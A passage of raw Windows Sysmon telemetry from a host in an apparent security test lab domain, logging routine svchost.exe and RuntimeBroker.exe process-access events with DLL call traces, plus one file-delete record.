12:02:16.417{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.402{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000004938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000004937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.386{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.371{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.355{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.355{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.355{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.308{266CAFBE-64C6-6064-A900-00000000AE01}34044568C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.308{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.277{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 